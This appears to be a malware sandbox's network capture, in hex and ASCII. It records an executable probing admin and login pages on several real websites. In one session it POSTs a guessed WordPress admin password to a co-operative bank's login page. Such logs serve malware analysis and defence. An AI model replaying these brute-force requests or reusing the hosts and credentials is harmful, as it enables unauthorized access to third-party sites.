                                                                                                                                                                                                    2023-11-26 06:00:07 UTC204INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 68 61 67 72 69 63 6f 6c 61 2e 63 6f 6d 2e 62 72 2f 61 64 6d 69 6e 2e 70 68 70 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxDate: Sun, 26 Nov 2023 06:00:07 GMTContent-Type: text/htmlContent-Length: 162Connection: closeLocation: https://www.rechagricola.com.br/admin.php
                                                                                                                                                                                                    2023-11-26 06:00:07 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    623192.168.2.458169194.47.252.1154436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:07 UTC240OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: www.maxiv.lu.se
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: ff59ae34f86788aafc83adbd6fbb16ab=294c8cffe744133c8b51c696bc79a752
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:08 UTC520INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 37 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 6c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 2e 6f 72 67 2f 22 0d 0a 6c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 6a 73 6f 6e 2f 77 70 2f 76 32 2f 70 61 67 65 73 2f 32 38 3e 3b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 3b 20 74 79
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKdate: Sun, 26 Nov 2023 06:00:07 GMTserver: Apache/2.4.57 (Debian)x-powered-by: PHP/8.2.12link: <https://www.maxiv.lu.se/wp-json/>; rel="https://api.w.org/"link: <https://www.maxiv.lu.se/wp-json/wp/v2/pages/28>; rel="alternate"; ty
                                                                                                                                                                                                    2023-11-26 06:00:08 UTC6240INData Raw: 31 38 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 4d 41 58 20 49 56 20 26 23 38 32 31 31 3b 20 57 65 20 6d 61 6b 65 20 74 68 65 20 69 6e 76 69 73 69 62
                                                                                                                                                                                                    Data Ascii: 1858<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link rel="profile" href="http://gmpg.org/xfn/11"><title>MAX IV &#8211; We make the invisib
                                                                                                                                                                                                    2023-11-26 06:00:08 UTC16322INData Raw: 33 46 42 41 0d 0a 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 29 20 21 69 6d 70 6f 72
                                                                                                                                                                                                    Data Ascii: 3FBAr{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !impor
                                                                                                                                                                                                    2023-11-26 06:00:08 UTC70INData Raw: 34 30 0d 0a 2e 32 32 37 2e 30 35 37 20 31 2e 32 36 36 2e 30 37 20 31 2e 36 34 36 2e 30 37 20 34 2e 38 35 73 2d 2e 30 31 35 20 33 2e 35 38 35 2d 2e 30 37 34 20 34 2e 38 35 63 2d 2e 30 36 31 20 31 2e 31 37 0d 0a
                                                                                                                                                                                                    Data Ascii: 40.227.057 1.266.07 1.646.07 4.85s-.015 3.585-.074 4.85c-.061 1.17
                                                                                                                                                                                                    2023-11-26 06:00:08 UTC16328INData Raw: 33 46 43 30 0d 0a 2d 2e 32 35 36 20 31 2e 38 30 35 2d 2e 34 32 31 20 32 2e 32 32 37 61 33 2e 38 31 20 33 2e 38 31 20 30 20 30 20 31 2d 2e 38 39 39 20 31 2e 33 38 32 20 33 2e 37 34 34 20 33 2e 37 34 34 20 30 20 30 20 31 2d 31 2e 33 38 2e 38 39 36 63 2d 2e 34 32 2e 31 36 34 2d 31 2e 30 36 35 2e 33 36 2d 32 2e 32 33 35 2e 34 31 33 2d 31 2e 32 37 34 2e 30 35 37 2d 31 2e 36 34 39 2e 30 37 2d 34 2e 38 35 39 2e 30 37 2d 33 2e 32 31 31 20 30 2d 33 2e 35 38 36 2d 2e 30 31 35 2d 34 2e 38 35 39 2d 2e 30 37 34 2d 31 2e 31 37 31 2d 2e 30 36 31 2d 31 2e 38 31 36 2d 2e 32 35 36 2d 32 2e 32 33 36 2d 2e 34 32 31 61 33 2e 37 31 36 20 33 2e 37 31 36 20 30 20 30 20 31 2d 31 2e 33 37 39 2d 2e 38 39 39 20 33 2e 36 34 34 20 33 2e 36 34 34 20 30 20 30 20 31 2d 2e 39 2d 31 2e 33
                                                                                                                                                                                                    Data Ascii: 3FC0-.256 1.805-.421 2.227a3.81 3.81 0 0 1-.899 1.382 3.744 3.744 0 0 1-1.38.896c-.42.164-1.065.36-2.235.413-1.274.057-1.649.07-4.859.07-3.211 0-3.586-.015-4.859-.074-1.171-.061-1.816-.256-2.236-.421a3.716 3.716 0 0 1-1.379-.899 3.644 3.644 0 0 1-.9-1.3
                                                                                                                                                                                                    2023-11-26 06:00:08 UTC16320INData Raw: 33 46 42 38 0d 0a 3c 2f 73 70 61 6e 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 67 61 2d 6d 65 6e 75 2d 77 72 61 70 70 65 72 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 77 69 74 68 2d 69 6d 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 31 27 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 67 61 2d 6d 65 6e 75 2d 69 74 65 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 67 61 2d 6d 65 6e 75 2d 69 74 65 6d 2d 69 6d 61 67 65 2d 77 72 61 70 70 65 72 22 3e 3c 61 20 68 72 65 66 3d 22 68 74
                                                                                                                                                                                                    Data Ascii: 3FB8</span><div class="mega-menu-wrapper"><ul class="container"><li class='menu-item menu-item-type-post_type menu-item-object-page menu-item-with-image item-depth-1'><div class="mega-menu-item-wrap"><div class="mega-menu-item-image-wrapper"><a href="ht
                                                                                                                                                                                                    2023-11-26 06:00:08 UTC16328INData Raw: 33 46 43 30 0d 0a 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 62 65 61 6d 6c 69 6e 65 73 2f 62 61 6c 64 65 72 2f 65 78 70 65 72 69 6d 65 6e 74 61 6c 2d 73 74 61 74 69 6f 6e 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 45 78 70 65 72 69 6d 65 6e 74 61 6c 20 73 74 61 74 69 6f 6e 3c 2f 61 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 73 75 62 6d 65 6e 75 2d 74 6f 67 67 6c 65 72 20 70 6c 75 73 2d 69 63 6f 6e 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 2d 73 68 61 72 70 22 3e 61 64
                                                                                                                                                                                                    Data Ascii: 3FC0ef="https://www.maxiv.lu.se/beamlines-accelerators/beamlines/balder/experimental-station/" class="menu-item-label">Experimental station</a><span class="material-icon submenu-toggler plus-icon" aria-hidden="true"><span class="material-icons-sharp">ad
                                                                                                                                                                                                    2023-11-26 06:00:08 UTC16320INData Raw: 33 46 42 38 0d 0a 61 6d 6c 69 6e 65 73 2f 64 61 6e 6d 61 78 2f 65 78 70 65 72 69 6d 65 6e 74 61 6c 2d 73 74 61 74 69 6f 6e 2f 73 61 6d 70 6c 65 2d 65 6e 76 69 72 6f 6e 6d 65 6e 74 73 2d 61 6e 64 2d 65 71 75 69 70 6d 65 6e 74 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 53 61 6d 70 6c 65 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 73 20 61 6e 64 20 65 71 75 69 70 6d 65 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 34 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77
                                                                                                                                                                                                    Data Ascii: 3FB8amlines/danmax/experimental-station/sample-environments-and-equipment/" class="menu-item-label">Sample environments and equipment</a></li></ul></li><li class='menu-item menu-item-type-post_type menu-item-object-page item-depth-4'><a href="https://ww
                                                                                                                                                                                                    2023-11-26 06:00:08 UTC16328INData Raw: 33 46 43 30 0d 0a 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 2d 73 68 61 72 70 22 3e 61 64 64 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 73 75 62 6d 65 6e 75 2d 74 6f 67 67 6c 65 72 20 64 2d 6e 6f 6e 65 20 6d 69 6e 75 73 2d 69 63 6f 6e 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 2d 73 68 61 72 70 22 3e 72 65 6d 6f 76 65 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 75 6c 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20
                                                                                                                                                                                                    Data Ascii: 3FC0="material-icons-sharp">add</span></span><span class="material-icon submenu-toggler d-none minus-icon" aria-hidden="true"><span class="material-icons-sharp">remove</span></span><ul><li class='menu-item menu-item-type-post_type menu-item-object-page
                                                                                                                                                                                                    2023-11-26 06:00:08 UTC16328INData Raw: 33 46 43 30 0d 0a 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 75 6c 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 69 74 65 6d 2d 64 65 70 74 68 2d 34 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 62 65 61 6d 6c 69 6e 65 73 2f 76 65 72 69 74 61 73 2f 75 73 65 72 2d 69 6e 66 6f 72 6d 61 74 69 6f 6e 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 55 73 65 72 20 69 6e 66 6f 72 6d
                                                                                                                                                                                                    Data Ascii: 3FC0span></span><ul><li class='menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children item-depth-4'><a href="https://www.maxiv.lu.se/beamlines-accelerators/beamlines/veritas/user-information/" class="menu-item-label">User inform


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    624192.168.2.4581943.111.240.64436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:07 UTC168OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: www.knu.ac.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:08 UTC1124INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 58 53 52 46 2d 54 4f 4b 45 4e 3d 65 79 4a 70 64 69 49 36 49 6d 5a 59 56 6a 42 75 61 6c 4e 48 59 33 46 4b 59 6d 4a 34 4e 56 46 53 61 54 6c 7a 59 6b 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 54 58 4e 6f 59 30 46 49 61 6c 64 54 55 6e 5a 75 56 54 6b 34 54 6c 4a 30 63 7a 42 43 55 48 4e 43 5a 48 56 34 4b 31 5a 4c 5a 47 35 4a 52 45 56 4d 56 44 6c 35 54 31 68 74 62 7a 68 4f 62 31 70 4e 53 46 5a 69 57 6a 6c 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:08 GMTServer: ApacheCache-Control: no-cache, privateSet-Cookie: XSRF-TOKEN=eyJpdiI6ImZYVjBualNHY3FKYmJ4NVFSaTlzYkE9PSIsInZhbHVlIjoiTXNoY0FIaldTUnZuVTk4TlJ0czBCUHNCZHV4K1ZLZG5JREVMVDl5T1htbzhOb1pNSFZiWjls
                                                                                                                                                                                                    2023-11-26 06:00:08 UTC5813INData Raw: 31 36 61 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 66 69 78 65 64 22 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 0d 0a 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62
                                                                                                                                                                                                    Data Ascii: 16a8<!doctype html><html class="fixed"><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalab


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    625192.168.2.458127164.52.221.514436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:07 UTC336OUTPOST /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: gccb.co.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://gccb.co.in/wp-login.php
                                                                                                                                                                                                    Content-Length: 126
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 06:00:07 UTC126OUTData Raw: 6c 6f 67 3d 61 64 6d 69 6e 26 70 77 64 3d 69 6e 66 6f 67 63 63 62 63 6f 69 6e 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 67 63 63 62 2e 63 6f 2e 69 6e 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=admin&pwd=infogccbcoin&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Fgccb.co.in%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 06:00:09 UTC412INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 37 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 30 2e 32 30 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 25
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:07 GMTServer: ApacheX-Powered-By: PHP/8.0.20Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wordpress_test_cookie=WP%
                                                                                                                                                                                                    2023-11-26 06:00:09 UTC6739INData Raw: 31 61 34 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 68 65 20 47 6f 64 68 72 61 20 43 69 74 79 20 43 6f 2d 6f 70 20 42 61 6e 6b 20 4c 74 64 2e 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72
                                                                                                                                                                                                    Data Ascii: 1a4b<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; The Godhra City Co-op Bank Ltd. &#8212; WordPress</title><meta name='robots' content='max-image-preview:lar
                                                                                                                                                                                                    2023-11-26 06:00:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    626192.168.2.45831418.228.96.1424436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:07 UTC182OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                    Host: www.rechagricola.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:08 UTC440INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 72 65 63 68 2e 63 6f 6d 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6f 72 69 67 69 6e 44 69 72 65 63 74 3d 74 72 75 65 3b 20 4d 61 78 2d 41 67 65 3d 36 30 34 38 30 30 3b 20 45 78 70 69 72 65 73 3d 53 75 6e 2c 20 30 33 20 44 65 63 20 32 30 32 33 20 30 36 3a 30 30 3a 30 37 20 47 4d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 06:00:07 GMTContent-Length: 0Connection: closeContent-Security-Policy: frame-ancestors 'self'Location: https://rech.comSet-Cookie: originDirect=true; Max-Age=604800; Expires=Sun, 03 Dec 2023 06:00:07 GM


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    627192.168.2.458328120.88.73.2384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:07 UTC238OUTGET /login/?page=%2Fpma%2F HTTP/1.1
                                                                                                                                                                                                    Host: my.calvary.qld.edu.au
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PHPSESSID=nn0g7rh2miv369ou46lobg5pmb
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
